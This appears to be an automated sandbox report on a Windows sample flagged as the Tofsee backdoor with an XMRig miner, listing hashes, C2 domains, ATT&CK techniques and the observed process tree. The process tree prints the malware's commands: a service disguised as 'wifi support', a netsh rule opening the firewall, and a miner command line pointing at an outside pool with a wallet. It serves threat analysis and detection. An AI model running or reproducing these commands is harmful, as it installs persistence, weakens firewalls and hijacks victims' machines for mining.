Analysis

  • max time kernel
    129s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    29-05-2023 15:04

General

  • Target

    file.exe

  • Size

    327KB

  • MD5

    f4e4532af8047a15ae7040a12801d18d

  • SHA1

    3931db953fc1a08dd436bbba3d07f00c9010c0f5

  • SHA256

    f1b14007a26d653067be8c62a58f74b016510a9319f397af6bc25563af031134

  • SHA512

    84927da999e23bf8bd35629d2f028bdcf3db7d866369d67d8e8c142ba937b8eccb22bc5f959dcc31d43153fc843344b8966967d3bb6df78221f0c42a16a3d687

  • SSDEEP

    3072:pl9KGMGYbcp6z/CO0HL4LPvwo4DX6r4e4hXodaGhrOdf2L/5yX0eIGl1qoMfpT:QGTuXzELOXwo4a4eCodaGV405UoX

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yaphsmaq\
      2⤵
        PID:872
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\tcitrgy.exe" C:\Windows\SysWOW64\yaphsmaq\
        2⤵
          PID:2032
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create yaphsmaq binPath= "C:\Windows\SysWOW64\yaphsmaq\tcitrgy.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:472
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description yaphsmaq "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:672
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start yaphsmaq
          2⤵
          • Launches sc.exe
          PID:1884
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:828
      • C:\Windows\SysWOW64\yaphsmaq\tcitrgy.exe
        C:\Windows\SysWOW64\yaphsmaq\tcitrgy.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:656
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1800
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe --algo=cn-heavy/xhv -o fastpool.xyz:10162 -u abLocBRHmSKSwfZexhaPDFFpUd1Szsp1RWPZktGDuK2w76S3KYNSLGndi55YtoHoKYbSFMCCWjxzTfwHxZSm7sNLe2rAq4DqbAF.70000 -p x -k
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1712

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\tcitrgy.exe
        Filesize

        14.0MB

        MD5

        b0243f8ea0cc8045508db6a547b349af

        SHA1

        b71da748b96060db4ecac1d50f0f41015cf965ec

        SHA256

        6c5b05bf1468eba2368b7aa08d17aad4f1745b0f31009db00bde812fee24d145

        SHA512

        2ab4a3cc8a3ba9ac2dbe57e660fa969192aa42a43e44e760b5b0bb1028932a448ba8d362a465461c33fba3b7294f59f4aef25fb0ea85d51122f19ca356d606b1

      • C:\Windows\SysWOW64\yaphsmaq\tcitrgy.exe
        Filesize

        14.0MB

        MD5

        b0243f8ea0cc8045508db6a547b349af

        SHA1

        b71da748b96060db4ecac1d50f0f41015cf965ec

        SHA256

        6c5b05bf1468eba2368b7aa08d17aad4f1745b0f31009db00bde812fee24d145

        SHA512

        2ab4a3cc8a3ba9ac2dbe57e660fa969192aa42a43e44e760b5b0bb1028932a448ba8d362a465461c33fba3b7294f59f4aef25fb0ea85d51122f19ca356d606b1

      • memory/656-65-0x0000000000400000-0x00000000006D0000-memory.dmp
        Filesize

        2.8MB

      • memory/1712-112-0x00000000001D0000-0x00000000002C1000-memory.dmp
        Filesize

        964KB

      • memory/1712-124-0x00000000001D0000-0x00000000002C1000-memory.dmp
        Filesize

        964KB

      • memory/1712-123-0x00000000001D0000-0x00000000002C1000-memory.dmp
        Filesize

        964KB

      • memory/1712-122-0x00000000001D0000-0x00000000002C1000-memory.dmp
        Filesize

        964KB

      • memory/1712-121-0x00000000001D0000-0x00000000002C1000-memory.dmp
        Filesize

        964KB

      • memory/1712-120-0x00000000001D0000-0x00000000002C1000-memory.dmp
        Filesize

        964KB

      • memory/1712-119-0x00000000001D0000-0x00000000002C1000-memory.dmp
        Filesize

        964KB

      • memory/1712-116-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/1712-111-0x00000000001D0000-0x00000000002C1000-memory.dmp
        Filesize

        964KB

      • memory/1800-88-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-95-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-78-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-82-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-81-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-83-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-84-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-85-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-86-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-87-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-62-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/1800-89-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-90-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-91-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-92-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-93-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-94-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-75-0x00000000000E0000-0x00000000000E6000-memory.dmp
        Filesize

        24KB

      • memory/1800-96-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-97-0x0000000000150000-0x0000000000160000-memory.dmp
        Filesize

        64KB

      • memory/1800-98-0x0000000000210000-0x0000000000215000-memory.dmp
        Filesize

        20KB

      • memory/1800-101-0x0000000000210000-0x0000000000215000-memory.dmp
        Filesize

        20KB

      • memory/1800-102-0x00000000057F0000-0x0000000005BFB000-memory.dmp
        Filesize

        4.0MB

      • memory/1800-105-0x00000000057F0000-0x0000000005BFB000-memory.dmp
        Filesize

        4.0MB

      • memory/1800-106-0x0000000000220000-0x0000000000227000-memory.dmp
        Filesize

        28KB

      • memory/1800-110-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1800-74-0x0000000001A80000-0x0000000001C8F000-memory.dmp
        Filesize

        2.1MB

      • memory/1800-71-0x0000000001A80000-0x0000000001C8F000-memory.dmp
        Filesize

        2.1MB

      • memory/1800-69-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1800-68-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1800-67-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1800-63-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1800-61-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/2024-55-0x0000000000220000-0x0000000000233000-memory.dmp
        Filesize

        76KB

      • memory/2024-59-0x0000000000400000-0x00000000006D0000-memory.dmp
        Filesize

        2.8MB